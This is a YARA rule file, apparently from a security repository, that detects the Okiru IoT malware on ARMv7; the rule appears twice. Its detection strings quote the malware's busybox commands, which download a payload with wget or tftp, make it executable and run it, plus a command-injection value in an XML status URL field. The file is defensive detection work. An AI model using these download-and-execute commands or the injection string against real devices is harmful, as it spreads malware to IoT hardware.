azurda/Okiru.yar

## Okiru.yar
rule Okiru : arm7 {
  	meta:
	    date = "11.12.2017"
	    description = "Ruleset to detect the Okiru IoT malware based on the ARMv7 version found."
	strings:
		$busy_1 = "/bin/busybox cp /bin/busybox %s; /bin/busybox cp /bin/busybox %s; >%s; >%s; /bin/busybox chmod 777 %s %s"
		$busy_2 = "/bin/busybox cp /bin/busybox %s; >%s; /bin/busybox chmod 777 %s"
		$busy_3 = "/bin/busybox wget http://%d.%d.%d.%d:%d/fahwrzadws/okiru.%s -O -> %s; /bin/busybox chmod 777 %s; ./%s; >%s"
		$busy_4 = "/bin/busybox tftp -r okiru.%s -l %s -g %d.%d.%d.%d; /bin/busybox chmod 777 %s; ./%s; >%s"
		$busy_5 = "/bin/busybox echo -en '%s' %s %s && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'"
		// $busy_6 = "/bin/busybox echo '%s\c' %s %s && /bin/busybox echo '\x45\x43\x48\x4f\x44\x4f\x4e\x45\c'"
		$xml = "<NewStatusURL>$(/bin/busybox wget -g %d.%d.%d.%d -l /tmp/.f -r /b; sh /tmp/.f)</NewStatusURL>"
	condition:
		3 of ($busy_*) and $xml
}
	rule Okiru : arm7 {
	meta:
	date = "11.12.2017"
	description = "Ruleset to detect the Okiru IoT malware based on the ARMv7 version found."
	strings:
	$busy_1 = "/bin/busybox cp /bin/busybox %s; /bin/busybox cp /bin/busybox %s; >%s; >%s; /bin/busybox chmod 777 %s %s"
	$busy_2 = "/bin/busybox cp /bin/busybox %s; >%s; /bin/busybox chmod 777 %s"
	$busy_3 = "/bin/busybox wget http://%d.%d.%d.%d:%d/fahwrzadws/okiru.%s -O -> %s; /bin/busybox chmod 777 %s; ./%s; >%s"
	$busy_4 = "/bin/busybox tftp -r okiru.%s -l %s -g %d.%d.%d.%d; /bin/busybox chmod 777 %s; ./%s; >%s"
	$busy_5 = "/bin/busybox echo -en '%s' %s %s && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'"
	// $busy_6 = "/bin/busybox echo '%s\c' %s %s && /bin/busybox echo '\x45\x43\x48\x4f\x44\x4f\x4e\x45\c'"
	$xml = "<NewStatusURL>$(/bin/busybox wget -g %d.%d.%d.%d -l /tmp/.f -r /b; sh /tmp/.f)</NewStatusURL>"
	condition:
	3 of ($busy_*) and $xml
	}